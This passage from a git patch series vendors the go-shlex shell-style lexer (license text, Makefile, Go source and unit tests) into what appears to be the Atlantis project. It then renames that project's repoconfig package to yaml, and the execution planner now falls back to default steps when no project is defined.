"Licensor" shall mean the copyright owner or entity authorized by + the copyright owner that is granting the License. + + "Legal Entity" shall mean the union of the acting entity and all + other entities that control, are controlled by, or are under common + control with that entity. For the purposes of this definition, + "control" means (i) the power, direct or indirect, to cause the + direction or management of such entity, whether by contract or + otherwise, or (ii) ownership of fifty percent (50%) or more of the + outstanding shares, or (iii) beneficial ownership of such entity. + + "You" (or "Your") shall mean an individual or Legal Entity + exercising permissions granted by this License. + + "Source" form shall mean the preferred form for making modifications, + including but not limited to software source code, documentation + source, and configuration files. + + "Object" form shall mean any form resulting from mechanical + transformation or translation of a Source form, including but + not limited to compiled object code, generated documentation, + and conversions to other media types. + + "Work" shall mean the work of authorship, whether in Source or + Object form, made available under the License, as indicated by a + copyright notice that is included in or attached to the work + (an example is provided in the Appendix below). + + "Derivative Works" shall mean any work, whether in Source or Object + form, that is based on (or derived from) the Work and for which the + editorial revisions, annotations, elaborations, or other modifications + represent, as a whole, an original work of authorship. For the purposes + of this License, Derivative Works shall not include works that remain + separable from, or merely link (or bind by name) to the interfaces of, + the Work and Derivative Works thereof. + + "Contribution" shall mean any work of authorship, including + the original version of the Work and any modifications or additions + to that Work or Derivative Works thereof, that is intentionally + submitted to Licensor for inclusion in the Work by the copyright owner + or by an individual or Legal Entity authorized to submit on behalf of + the copyright owner. For the purposes of this definition, "submitted" + means any form of electronic, verbal, or written communication sent + to the Licensor or its representatives, including but not limited to + communication on electronic mailing lists, source code control systems, + and issue tracking systems that are managed by, or on behalf of, the + Licensor for the purpose of discussing and improving the Work, but + excluding communication that is conspicuously marked or otherwise + designated in writing by the copyright owner as "Not a Contribution." + + "Contributor" shall mean Licensor and any individual or Legal Entity + on behalf of whom a Contribution has been received by Licensor and + subsequently incorporated within the Work. + + 2. Grant of Copyright License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + copyright license to reproduce, prepare Derivative Works of, + publicly display, publicly perform, sublicense, and distribute the + Work and such Derivative Works in Source or Object form. + + 3. Grant of Patent License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + (except as stated in this section) patent license to make, have made, + use, offer to sell, sell, import, and otherwise transfer the Work, + where such license applies only to those patent claims licensable + by such Contributor that are necessarily infringed by their + Contribution(s) alone or by combination of their Contribution(s) + with the Work to which such Contribution(s) was submitted. If You + institute patent litigation against any entity (including a + cross-claim or counterclaim in a lawsuit) alleging that the Work + or a Contribution incorporated within the Work constitutes direct + or contributory patent infringement, then any patent licenses + granted to You under this License for that Work shall terminate + as of the date such litigation is filed. + + 4. Redistribution. You may reproduce and distribute copies of the + Work or Derivative Works thereof in any medium, with or without + modifications, and in Source or Object form, provided that You + meet the following conditions: + + (a) You must give any other recipients of the Work or + Derivative Works a copy of this License; and + + (b) You must cause any modified files to carry prominent notices + stating that You changed the files; and + + (c) You must retain, in the Source form of any Derivative Works + that You distribute, all copyright, patent, trademark, and + attribution notices from the Source form of the Work, + excluding those notices that do not pertain to any part of + the Derivative Works; and + + (d) If the Work includes a "NOTICE" text file as part of its + distribution, then any Derivative Works that You distribute must + include a readable copy of the attribution notices contained + within such NOTICE file, excluding those notices that do not + pertain to any part of the Derivative Works, in at least one + of the following places: within a NOTICE text file distributed + as part of the Derivative Works; within the Source form or + documentation, if provided along with the Derivative Works; or, + within a display generated by the Derivative Works, if and + wherever such third-party notices normally appear. The contents + of the NOTICE file are for informational purposes only and + do not modify the License. You may add Your own attribution + notices within Derivative Works that You distribute, alongside + or as an addendum to the NOTICE text from the Work, provided + that such additional attribution notices cannot be construed + as modifying the License. + + You may add Your own copyright statement to Your modifications and + may provide additional or different license terms and conditions + for use, reproduction, or distribution of Your modifications, or + for any such Derivative Works as a whole, provided Your use, + reproduction, and distribution of the Work otherwise complies with + the conditions stated in this License. + + 5. Submission of Contributions. Unless You explicitly state otherwise, + any Contribution intentionally submitted for inclusion in the Work + by You to the Licensor shall be under the terms and conditions of + this License, without any additional terms or conditions. + Notwithstanding the above, nothing herein shall supersede or modify + the terms of any separate license agreement you may have executed + with Licensor regarding such Contributions. + + 6. Trademarks. This License does not grant permission to use the trade + names, trademarks, service marks, or product names of the Licensor, + except as required for reasonable and customary use in describing the + origin of the Work and reproducing the content of the NOTICE file. + + 7. Disclaimer of Warranty. Unless required by applicable law or + agreed to in writing, Licensor provides the Work (and each + Contributor provides its Contributions) on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or + implied, including, without limitation, any warranties or conditions + of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A + PARTICULAR PURPOSE. You are solely responsible for determining the + appropriateness of using or redistributing the Work and assume any + risks associated with Your exercise of permissions under this License. + + 8. Limitation of Liability. In no event and under no legal theory, + whether in tort (including negligence), contract, or otherwise, + unless required by applicable law (such as deliberate and grossly + negligent acts) or agreed to in writing, shall any Contributor be + liable to You for damages, including any direct, indirect, special, + incidental, or consequential damages of any character arising as a + result of this License or out of the use or inability to use the + Work (including but not limited to damages for loss of goodwill, + work stoppage, computer failure or malfunction, or any and all + other commercial damages or losses), even if such Contributor + has been advised of the possibility of such damages. + + 9. Accepting Warranty or Additional Liability. While redistributing + the Work or Derivative Works thereof, You may choose to offer, + and charge a fee for, acceptance of support, warranty, indemnity, + or other liability obligations and/or rights consistent with this + License. However, in accepting such obligations, You may act only + on Your own behalf and on Your sole responsibility, not on behalf + of any other Contributor, and only if You agree to indemnify, + defend, and hold each Contributor harmless for any liability + incurred by, or claims asserted against, such Contributor by reason + of your accepting any such warranty or additional liability. + + END OF TERMS AND CONDITIONS + + APPENDIX: How to apply the Apache License to your work. + + To apply the Apache License to your work, attach the following + boilerplate notice, with the fields enclosed by brackets "[]" + replaced with your own identifying information. (Don't include + the brackets!) The text should be enclosed in the appropriate + comment syntax for the file format. We also recommend that a + file or class name and description of purpose be included on the + same "printed page" as the copyright notice for easier + identification within third-party archives. + + Copyright [yyyy] [name of copyright owner] + + Licensed under the Apache License, Version 2.0 (the "License"); + you may not use this file except in compliance with the License. + You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + + Unless required by applicable law or agreed to in writing, software + distributed under the License is distributed on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + See the License for the specific language governing permissions and + limitations under the License. diff --git a/vendor/github.com/flynn-archive/go-shlex/Makefile b/vendor/github.com/flynn-archive/go-shlex/Makefile new file mode 100644 index 0000000000..038d9a4896 --- /dev/null +++ b/vendor/github.com/flynn-archive/go-shlex/Makefile @@ -0,0 +1,21 @@ +# Copyright 2011 Google Inc. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +include $(GOROOT)/src/Make.inc + +TARG=shlex +GOFILES=\ + shlex.go\ + +include $(GOROOT)/src/Make.pkg diff --git a/vendor/github.com/flynn-archive/go-shlex/README.md b/vendor/github.com/flynn-archive/go-shlex/README.md new file mode 100644 index 0000000000..c86bcc066f --- /dev/null +++ b/vendor/github.com/flynn-archive/go-shlex/README.md @@ -0,0 +1,2 @@ +go-shlex is a simple lexer for go that supports shell-style quoting, +commenting, and escaping. diff --git a/vendor/github.com/flynn-archive/go-shlex/shlex.go b/vendor/github.com/flynn-archive/go-shlex/shlex.go new file mode 100644 index 0000000000..7aeace801e --- /dev/null +++ b/vendor/github.com/flynn-archive/go-shlex/shlex.go @@ -0,0 +1,457 @@ +/* +Copyright 2012 Google Inc. All Rights Reserved. + +Licensed under the Apache License, Version 2.0 (the "License"); +you may not use this file except in compliance with the License. +You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + +Unless required by applicable law or agreed to in writing, software +distributed under the License is distributed on an "AS IS" BASIS, +WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +See the License for the specific language governing permissions and +limitations under the License. +*/ + +package shlex + +/* +Package shlex implements a simple lexer which splits input in to tokens using +shell-style rules for quoting and commenting. +*/ +import ( + "bufio" + "errors" + "fmt" + "io" + "strings" +) + +/* +A TokenType is a top-level token; a word, space, comment, unknown. +*/ +type TokenType int + +/* +A RuneTokenType is the type of a UTF-8 character; a character, quote, space, escape. +*/ +type RuneTokenType int + +type lexerState int + +type Token struct { + tokenType TokenType + value string +} + +/* +Two tokens are equal if both their types and values are equal. A nil token can +never equal another token. +*/ +func (a *Token) Equal(b *Token) bool { + if a == nil || b == nil { + return false + } + if a.tokenType != b.tokenType { + return false + } + return a.value == b.value +} + +const ( + RUNE_CHAR string = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789._-,/@$*()+=><:;&^%~|!?[]{}" + RUNE_SPACE string = " \t\r\n" + RUNE_ESCAPING_QUOTE string = "\"" + RUNE_NONESCAPING_QUOTE string = "'" + RUNE_ESCAPE = "\\" + RUNE_COMMENT = "#" + + RUNETOKEN_UNKNOWN RuneTokenType = 0 + RUNETOKEN_CHAR RuneTokenType = 1 + RUNETOKEN_SPACE RuneTokenType = 2 + RUNETOKEN_ESCAPING_QUOTE RuneTokenType = 3 + RUNETOKEN_NONESCAPING_QUOTE RuneTokenType = 4 + RUNETOKEN_ESCAPE RuneTokenType = 5 + RUNETOKEN_COMMENT RuneTokenType = 6 + RUNETOKEN_EOF RuneTokenType = 7 + + TOKEN_UNKNOWN TokenType = 0 + TOKEN_WORD TokenType = 1 + TOKEN_SPACE TokenType = 2 + TOKEN_COMMENT TokenType = 3 + + STATE_START lexerState = 0 + STATE_INWORD lexerState = 1 + STATE_ESCAPING lexerState = 2 + STATE_ESCAPING_QUOTED lexerState = 3 + STATE_QUOTED_ESCAPING lexerState = 4 + STATE_QUOTED lexerState = 5 + STATE_COMMENT lexerState = 6 + + INITIAL_TOKEN_CAPACITY int = 100 +) + +/* +A type for classifying characters. This allows for different sorts of +classifiers - those accepting extended non-ascii chars, or strict posix +compatibility, for example. +*/ +type TokenClassifier struct { + typeMap map[int32]RuneTokenType +} + +func addRuneClass(typeMap *map[int32]RuneTokenType, runes string, tokenType RuneTokenType) { + for _, rune := range runes { + (*typeMap)[int32(rune)] = tokenType + } +} + +/* +Create a new classifier for basic ASCII characters. +*/ +func NewDefaultClassifier() *TokenClassifier { + typeMap := map[int32]RuneTokenType{} + addRuneClass(&typeMap, RUNE_CHAR, RUNETOKEN_CHAR) + addRuneClass(&typeMap, RUNE_SPACE, RUNETOKEN_SPACE) + addRuneClass(&typeMap, RUNE_ESCAPING_QUOTE, RUNETOKEN_ESCAPING_QUOTE) + addRuneClass(&typeMap, RUNE_NONESCAPING_QUOTE, RUNETOKEN_NONESCAPING_QUOTE) + addRuneClass(&typeMap, RUNE_ESCAPE, RUNETOKEN_ESCAPE) + addRuneClass(&typeMap, RUNE_COMMENT, RUNETOKEN_COMMENT) + return &TokenClassifier{ + typeMap: typeMap} +} + +func (classifier *TokenClassifier) ClassifyRune(rune int32) RuneTokenType { + return classifier.typeMap[rune] +} + +/* +A type for turning an input stream in to a sequence of strings. Whitespace and +comments are skipped. +*/ +type Lexer struct { + tokenizer *Tokenizer +} + +/* +Create a new lexer. +*/ +func NewLexer(r io.Reader) (*Lexer, error) { + + tokenizer, err := NewTokenizer(r) + if err != nil { + return nil, err + } + lexer := &Lexer{tokenizer: tokenizer} + return lexer, nil +} + +/* +Return the next word, and an error value. If there are no more words, the error +will be io.EOF. +*/ +func (l *Lexer) NextWord() (string, error) { + var token *Token + var err error + for { + token, err = l.tokenizer.NextToken() + if err != nil { + return "", err + } + switch token.tokenType { + case TOKEN_WORD: + { + return token.value, nil + } + case TOKEN_COMMENT: + { + // skip comments + } + default: + { + panic(fmt.Sprintf("Unknown token type: %v", token.tokenType)) + } + } + } + return "", io.EOF +} + +/* +A type for turning an input stream in to a sequence of typed tokens. +*/ +type Tokenizer struct { + input *bufio.Reader + classifier *TokenClassifier +} + +/* +Create a new tokenizer. +*/ +func NewTokenizer(r io.Reader) (*Tokenizer, error) { + input := bufio.NewReader(r) + classifier := NewDefaultClassifier() + tokenizer := &Tokenizer{ + input: input, + classifier: classifier} + return tokenizer, nil +} + +/* +Scan the stream for the next token. + +This uses an internal state machine. It will panic if it encounters a character +which it does not know how to handle. +*/ +func (t *Tokenizer) scanStream() (*Token, error) { + state := STATE_START + var tokenType TokenType + value := make([]int32, 0, INITIAL_TOKEN_CAPACITY) + var ( + nextRune int32 + nextRuneType RuneTokenType + err error + ) +SCAN: + for { + nextRune, _, err = t.input.ReadRune() + nextRuneType = t.classifier.ClassifyRune(nextRune) + if err != nil { + if err == io.EOF { + nextRuneType = RUNETOKEN_EOF + err = nil + } else { + return nil, err + } + } + switch state { + case STATE_START: // no runes read yet + { + switch nextRuneType { + case RUNETOKEN_EOF: + { + return nil, io.EOF + } + case RUNETOKEN_CHAR: + { + tokenType = TOKEN_WORD + value = append(value, nextRune) + state = STATE_INWORD + } + case RUNETOKEN_SPACE: + { + } + case RUNETOKEN_ESCAPING_QUOTE: + { + tokenType = TOKEN_WORD + state = STATE_QUOTED_ESCAPING + } + case RUNETOKEN_NONESCAPING_QUOTE: + { + tokenType = TOKEN_WORD + state = STATE_QUOTED + } + case RUNETOKEN_ESCAPE: + { + tokenType = TOKEN_WORD + state = STATE_ESCAPING + } + case RUNETOKEN_COMMENT: + { + tokenType = TOKEN_COMMENT + state = STATE_COMMENT + } + default: + { + return nil, errors.New(fmt.Sprintf("Unknown rune: %v", nextRune)) + } + } + } + case STATE_INWORD: // in a regular word + { + switch nextRuneType { + case RUNETOKEN_EOF: + { + break SCAN + } + case RUNETOKEN_CHAR, RUNETOKEN_COMMENT: + { + value = append(value, nextRune) + } + case RUNETOKEN_SPACE: + { + t.input.UnreadRune() + break SCAN + } + case RUNETOKEN_ESCAPING_QUOTE: + { + state = STATE_QUOTED_ESCAPING + } + case RUNETOKEN_NONESCAPING_QUOTE: + { + state = STATE_QUOTED + } + case RUNETOKEN_ESCAPE: + { + state = STATE_ESCAPING + } + default: + { + return nil, errors.New(fmt.Sprintf("Uknown rune: %v", nextRune)) + } + } + } + case STATE_ESCAPING: // the next rune after an escape character + { + switch nextRuneType { + case RUNETOKEN_EOF: + { + err = errors.New("EOF found after escape character") + break SCAN + } + case RUNETOKEN_CHAR, RUNETOKEN_SPACE, RUNETOKEN_ESCAPING_QUOTE, RUNETOKEN_NONESCAPING_QUOTE, RUNETOKEN_ESCAPE, RUNETOKEN_COMMENT: + { + state = STATE_INWORD + value = append(value, nextRune) + } + default: + { + return nil, errors.New(fmt.Sprintf("Uknown rune: %v", nextRune)) + } + } + } + case STATE_ESCAPING_QUOTED: // the next rune after an escape character, in double quotes + { + switch nextRuneType { + case RUNETOKEN_EOF: + { + err = errors.New("EOF found after escape character") + break SCAN + } + case RUNETOKEN_CHAR, RUNETOKEN_SPACE, RUNETOKEN_ESCAPING_QUOTE, RUNETOKEN_NONESCAPING_QUOTE, RUNETOKEN_ESCAPE, RUNETOKEN_COMMENT: + { + state = STATE_QUOTED_ESCAPING + value = append(value, nextRune) + } + default: + { + return nil, errors.New(fmt.Sprintf("Uknown rune: %v", nextRune)) + } + } + } + case STATE_QUOTED_ESCAPING: // in escaping double quotes + { + switch nextRuneType { + case RUNETOKEN_EOF: + { + err = errors.New("EOF found when expecting closing quote.") + break SCAN + } + case RUNETOKEN_CHAR, RUNETOKEN_UNKNOWN, RUNETOKEN_SPACE, RUNETOKEN_NONESCAPING_QUOTE, RUNETOKEN_COMMENT: + { + value = append(value, nextRune) + } + case RUNETOKEN_ESCAPING_QUOTE: + { + state = STATE_INWORD + } + case RUNETOKEN_ESCAPE: + { + state = STATE_ESCAPING_QUOTED + } + default: + { + return nil, errors.New(fmt.Sprintf("Uknown rune: %v", nextRune)) + } + } + } + case STATE_QUOTED: // in non-escaping single quotes + { + switch nextRuneType { + case RUNETOKEN_EOF: + { + err = errors.New("EOF found when expecting closing quote.") + break SCAN + } + case RUNETOKEN_CHAR, RUNETOKEN_UNKNOWN, RUNETOKEN_SPACE, RUNETOKEN_ESCAPING_QUOTE, RUNETOKEN_ESCAPE, RUNETOKEN_COMMENT: + { + value = append(value, nextRune) + } + case RUNETOKEN_NONESCAPING_QUOTE: + { + state = STATE_INWORD + } + default: + { + return nil, errors.New(fmt.Sprintf("Uknown rune: %v", nextRune)) + } + } + } + case STATE_COMMENT: + { + switch nextRuneType { + case RUNETOKEN_EOF: + { + break SCAN + } + case RUNETOKEN_CHAR, RUNETOKEN_UNKNOWN, RUNETOKEN_ESCAPING_QUOTE, RUNETOKEN_ESCAPE, RUNETOKEN_COMMENT, RUNETOKEN_NONESCAPING_QUOTE: + { + value = append(value, nextRune) + } + case RUNETOKEN_SPACE: + { + if nextRune == '\n' { + state = STATE_START + break SCAN + } else { + value = append(value, nextRune) + } + } + default: + { + return nil, errors.New(fmt.Sprintf("Uknown rune: %v", nextRune)) + } + } + } + default: + { + panic(fmt.Sprintf("Unexpected state: %v", state)) + } + } + } + token := &Token{ + tokenType: tokenType, + value: string(value)} + return token, err +} + +/* +Return the next token in the stream, and an error value. If there are no more +tokens available, the error value will be io.EOF. +*/ +func (t *Tokenizer) NextToken() (*Token, error) { + return t.scanStream() +} + +/* +Split a string in to a slice of strings, based upon shell-style rules for +quoting, escaping, and spaces. +*/ +func Split(s string) ([]string, error) { + l, err := NewLexer(strings.NewReader(s)) + if err != nil { + return nil, err + } + subStrings := []string{} + for { + word, err := l.NextWord() + if err != nil { + if err == io.EOF { + return subStrings, nil + } + return subStrings, err + } + subStrings = append(subStrings, word) + } + return subStrings, nil +} diff --git a/vendor/github.com/flynn-archive/go-shlex/shlex_test.go b/vendor/github.com/flynn-archive/go-shlex/shlex_test.go new file mode 100644 index 0000000000..7551f7c598 --- /dev/null +++ b/vendor/github.com/flynn-archive/go-shlex/shlex_test.go @@ -0,0 +1,162 @@ +/* +Copyright 2012 Google Inc. All Rights Reserved. + +Licensed under the Apache License, Version 2.0 (the "License"); +you may not use this file except in compliance with the License. +You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + +Unless required by applicable law or agreed to in writing, software +distributed under the License is distributed on an "AS IS" BASIS, +WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +See the License for the specific language governing permissions and +limitations under the License. +*/ + +package shlex + +import ( + "strings" + "testing" +) + +func checkError(err error, t *testing.T) { + if err != nil { + t.Error(err) + } +} + +func TestClassifier(t *testing.T) { + classifier := NewDefaultClassifier() + runeTests := map[int32]RuneTokenType{ + 'a': RUNETOKEN_CHAR, + ' ': RUNETOKEN_SPACE, + '"': RUNETOKEN_ESCAPING_QUOTE, + '\'': RUNETOKEN_NONESCAPING_QUOTE, + '#': RUNETOKEN_COMMENT} + for rune, expectedType := range runeTests { + foundType := classifier.ClassifyRune(rune) + if foundType != expectedType { + t.Logf("Expected type: %v for rune '%c'(%v). Found type: %v.", expectedType, rune, rune, foundType) + t.Fail() + } + } +} + +func TestTokenizer(t *testing.T) { + testInput := strings.NewReader("one two \"three four\" \"five \\\"six\\\"\" seven#eight # nine # ten\n eleven") + expectedTokens := []*Token{ + &Token{ + tokenType: TOKEN_WORD, + value: "one"}, + &Token{ + tokenType: TOKEN_WORD, + value: "two"}, + &Token{ + tokenType: TOKEN_WORD, + value: "three four"}, + &Token{ + tokenType: TOKEN_WORD, + value: "five \"six\""}, + &Token{ + tokenType: TOKEN_WORD, + value: "seven#eight"}, + &Token{ + tokenType: TOKEN_COMMENT, + value: " nine # ten"}, + &Token{ + tokenType: TOKEN_WORD, + value: "eleven"}} + + tokenizer, err := NewTokenizer(testInput) + checkError(err, t) + for _, expectedToken := range expectedTokens { + foundToken, err := tokenizer.NextToken() + checkError(err, t) + if !foundToken.Equal(expectedToken) { + t.Error("Expected token:", expectedToken, ". Found:", foundToken) + } + } +} + +func TestLexer(t *testing.T) { + testInput := strings.NewReader("one") + expectedWord := "one" + lexer, err := NewLexer(testInput) + checkError(err, t) + foundWord, err := lexer.NextWord() + checkError(err, t) + if expectedWord != foundWord { + t.Error("Expected word:", expectedWord, ". Found:", foundWord) + } +} + +func TestSplitSimple(t *testing.T) { + testInput := "one two three" + expectedOutput := []string{"one", "two", "three"} + foundOutput, err := Split(testInput) + if err != nil { + t.Error("Split returned error:", err) + } + if len(expectedOutput) != len(foundOutput) { + t.Error("Split expected:", len(expectedOutput), "results. Found:", len(foundOutput), "results") + } + for i := range foundOutput { + if foundOutput[i] != expectedOutput[i] { + t.Error("Item:", i, "(", foundOutput[i], ") differs from the expected value:", expectedOutput[i]) + } + } +} + +func TestSplitEscapingQuotes(t *testing.T) { + testInput := "one \"два ${three}\" four" + expectedOutput := []string{"one", "два ${three}", "four"} + foundOutput, err := Split(testInput) + if err != nil { + t.Error("Split returned error:", err) + } + if len(expectedOutput) != len(foundOutput) { + t.Error("Split expected:", len(expectedOutput), "results. Found:", len(foundOutput), "results") + } + for i := range foundOutput { + if foundOutput[i] != expectedOutput[i] { + t.Error("Item:", i, "(", foundOutput[i], ") differs from the expected value:", expectedOutput[i]) + } + } +} + +func TestGlobbingExpressions(t *testing.T) { + testInput := "onefile *file one?ile onefil[de]" + expectedOutput := []string{"onefile", "*file", "one?ile", "onefil[de]"} + foundOutput, err := Split(testInput) + if err != nil { + t.Error("Split returned error", err) + } + if len(expectedOutput) != len(foundOutput) { + t.Error("Split expected:", len(expectedOutput), "results. Found:", len(foundOutput), "results") + } + for i := range foundOutput { + if foundOutput[i] != expectedOutput[i] { + t.Error("Item:", i, "(", foundOutput[i], ") differs from the expected value:", expectedOutput[i]) + } + } + +} + +func TestSplitNonEscapingQuotes(t *testing.T) { + testInput := "one 'два ${three}' four" + expectedOutput := []string{"one", "два ${three}", "four"} + foundOutput, err := Split(testInput) + if err != nil { + t.Error("Split returned error:", err) + } + if len(expectedOutput) != len(foundOutput) { + t.Error("Split expected:", len(expectedOutput), "results. Found:", len(foundOutput), "results") + } + for i := range foundOutput { + if foundOutput[i] != expectedOutput[i] { + t.Error("Item:", i, "(", foundOutput[i], ") differs from the expected value:", expectedOutput[i]) + } + } +} From 69c788ec663e3b086eecdb70a8fac8b35c26c4e3 Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Thu, 7 Jun 2018 15:40:48 +0100 Subject: [PATCH 13/69] Rename package repoconfig to yaml --- server/events/apply_executor.go | 4 +- server/events/plan_executor.go | 4 +- server/events/repoconfig/run_step_test.go | 3 - .../events/{repoconfig => yaml}/apply_step.go | 2 +- .../{repoconfig => yaml}/apply_step_test.go | 16 +-- server/events/{repoconfig => yaml}/config.go | 2 +- .../{repoconfig => yaml}/execution_planner.go | 6 +- .../events/{repoconfig => yaml}/init_step.go | 2 +- .../{repoconfig => yaml}/init_step_test.go | 8 +- .../events/{repoconfig => yaml}/plan_step.go | 2 +- .../{repoconfig => yaml}/plan_step_test.go | 28 ++-- server/events/{repoconfig => yaml}/reader.go | 6 +- .../{repoconfig => yaml}/reader_test.go | 124 +++++++++++------- .../events/{repoconfig => yaml}/repoconfig.go | 2 +- .../events/{repoconfig => yaml}/run_step.go | 2 +- server/events/yaml/run_step_test.go | 3 + server/server.go | 6 +- 17 files changed, 123 insertions(+), 97 deletions(-) delete mode 100644 server/events/repoconfig/run_step_test.go rename server/events/{repoconfig => yaml}/apply_step.go (97%) rename server/events/{repoconfig => yaml}/apply_step_test.go (89%) rename server/events/{repoconfig => yaml}/config.go (99%) rename server/events/{repoconfig => yaml}/execution_planner.go (95%) rename server/events/{repoconfig => yaml}/init_step.go (97%) rename server/events/{repoconfig => yaml}/init_step_test.go (92%) rename server/events/{repoconfig => yaml}/plan_step.go (99%) rename server/events/{repoconfig => yaml}/plan_step_test.go (95%) rename server/events/{repoconfig => yaml}/reader.go (93%) rename server/events/{repoconfig => yaml}/reader_test.go (85%) rename server/events/{repoconfig => yaml}/repoconfig.go (99%) rename server/events/{repoconfig => yaml}/run_step.go (97%) create mode 100644 server/events/yaml/run_step_test.go diff --git a/server/events/apply_executor.go b/server/events/apply_executor.go index 534546997d..6562d8ab8e 100644 --- a/server/events/apply_executor.go +++ b/server/events/apply_executor.go @@ -15,11 +15,11 @@ package events import ( "github.com/runatlantis/atlantis/server/events/models" - "github.com/runatlantis/atlantis/server/events/repoconfig" "github.com/runatlantis/atlantis/server/events/run" "github.com/runatlantis/atlantis/server/events/terraform" "github.com/runatlantis/atlantis/server/events/vcs" "github.com/runatlantis/atlantis/server/events/webhooks" + "github.com/runatlantis/atlantis/server/events/yaml" ) // ApplyExecutor handles executing terraform apply. @@ -31,7 +31,7 @@ type ApplyExecutor struct { AtlantisWorkspace AtlantisWorkspace ProjectLocker *DefaultProjectLocker Webhooks webhooks.Sender - ExecutionPlanner *repoconfig.ExecutionPlanner + ExecutionPlanner *yaml.ExecutionPlanner } // Execute executes apply for the ctx. diff --git a/server/events/plan_executor.go b/server/events/plan_executor.go index 4983c17701..a620f2cb43 100644 --- a/server/events/plan_executor.go +++ b/server/events/plan_executor.go @@ -18,10 +18,10 @@ import ( "github.com/runatlantis/atlantis/server/events/locking" "github.com/runatlantis/atlantis/server/events/models" - "github.com/runatlantis/atlantis/server/events/repoconfig" "github.com/runatlantis/atlantis/server/events/run" "github.com/runatlantis/atlantis/server/events/terraform" "github.com/runatlantis/atlantis/server/events/vcs" + "github.com/runatlantis/atlantis/server/events/yaml" ) //go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_lock_url_generator.go LockURLGenerator @@ -39,7 +39,7 @@ type PlanExecutor struct { Workspace AtlantisWorkspace ProjectFinder ProjectFinder ProjectLocker ProjectLocker - ExecutionPlanner *repoconfig.ExecutionPlanner + ExecutionPlanner *yaml.ExecutionPlanner LockURLGenerator LockURLGenerator } diff --git a/server/events/repoconfig/run_step_test.go b/server/events/repoconfig/run_step_test.go deleted file mode 100644 index fdab8a9b5f..0000000000 --- a/server/events/repoconfig/run_step_test.go +++ /dev/null @@ -1,3 +0,0 @@ -package repoconfig - -// todo diff --git a/server/events/repoconfig/apply_step.go b/server/events/yaml/apply_step.go similarity index 97% rename from server/events/repoconfig/apply_step.go rename to server/events/yaml/apply_step.go index d883c3a02c..4b6a360612 100644 --- a/server/events/repoconfig/apply_step.go +++ b/server/events/yaml/apply_step.go @@ -1,4 +1,4 @@ -package repoconfig +package yaml import ( "fmt" diff --git a/server/events/repoconfig/apply_step_test.go b/server/events/yaml/apply_step_test.go similarity index 89% rename from server/events/repoconfig/apply_step_test.go rename to server/events/yaml/apply_step_test.go index 37e0af2f71..f2066140e2 100644 --- a/server/events/repoconfig/apply_step_test.go +++ b/server/events/yaml/apply_step_test.go @@ -1,4 +1,4 @@ -package repoconfig_test +package yaml_test import ( "io/ioutil" @@ -8,15 +8,15 @@ import ( "github.com/hashicorp/go-version" . "github.com/petergtz/pegomock" "github.com/runatlantis/atlantis/server/events/mocks/matchers" - "github.com/runatlantis/atlantis/server/events/repoconfig" matchers2 "github.com/runatlantis/atlantis/server/events/run/mocks/matchers" "github.com/runatlantis/atlantis/server/events/terraform/mocks" + "github.com/runatlantis/atlantis/server/events/yaml" . "github.com/runatlantis/atlantis/testing" ) func TestRun_NoDir(t *testing.T) { - s := repoconfig.ApplyStep{ - Meta: repoconfig.StepMeta{ + s := yaml.ApplyStep{ + Meta: yaml.StepMeta{ Workspace: "workspace", AbsolutePath: "nonexistent/path", DirRelativeToRepoRoot: ".", @@ -33,8 +33,8 @@ func TestRun_NoPlanFile(t *testing.T) { tmpDir, cleanup := TempDir(t) defer cleanup() - s := repoconfig.ApplyStep{ - Meta: repoconfig.StepMeta{ + s := yaml.ApplyStep{ + Meta: yaml.StepMeta{ Workspace: "workspace", AbsolutePath: tmpDir, DirRelativeToRepoRoot: ".", @@ -58,8 +58,8 @@ func TestRun_Success(t *testing.T) { terraform := mocks.NewMockClient() tfVersion, _ := version.NewVersion("0.11.4") - s := repoconfig.ApplyStep{ - Meta: repoconfig.StepMeta{ + s := yaml.ApplyStep{ + Meta: yaml.StepMeta{ Workspace: "workspace", AbsolutePath: tmpDir, DirRelativeToRepoRoot: ".", diff --git a/server/events/repoconfig/config.go b/server/events/yaml/config.go similarity index 99% rename from server/events/repoconfig/config.go rename to server/events/yaml/config.go index acdc7a0ce6..3fffcf0135 100644 --- a/server/events/repoconfig/config.go +++ b/server/events/yaml/config.go @@ -1,4 +1,4 @@ -package repoconfig +package yaml import ( "fmt" diff --git a/server/events/repoconfig/execution_planner.go b/server/events/yaml/execution_planner.go similarity index 95% rename from server/events/repoconfig/execution_planner.go rename to server/events/yaml/execution_planner.go index c94001925e..c349034004 100644 --- a/server/events/repoconfig/execution_planner.go +++ b/server/events/yaml/execution_planner.go @@ -1,4 +1,4 @@ -package repoconfig +package yaml import ( "fmt" @@ -96,7 +96,9 @@ func (s *ExecutionPlanner) buildStage(stageName string, log *logging.SimpleLogge return steps, nil } } - return nil, fmt.Errorf("no project with dir %q and workspace %q defined", relProjectPath, workspace) + // They haven't defined this project, use the default workflow. + log.Info("no project with dir %q and workspace %q defined; continuing with defaults", relProjectPath, workspace) + return defaults, nil } func (s *ExecutionPlanner) BuildApplyStage(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) (*ApplyStage, error) { diff --git a/server/events/repoconfig/init_step.go b/server/events/yaml/init_step.go 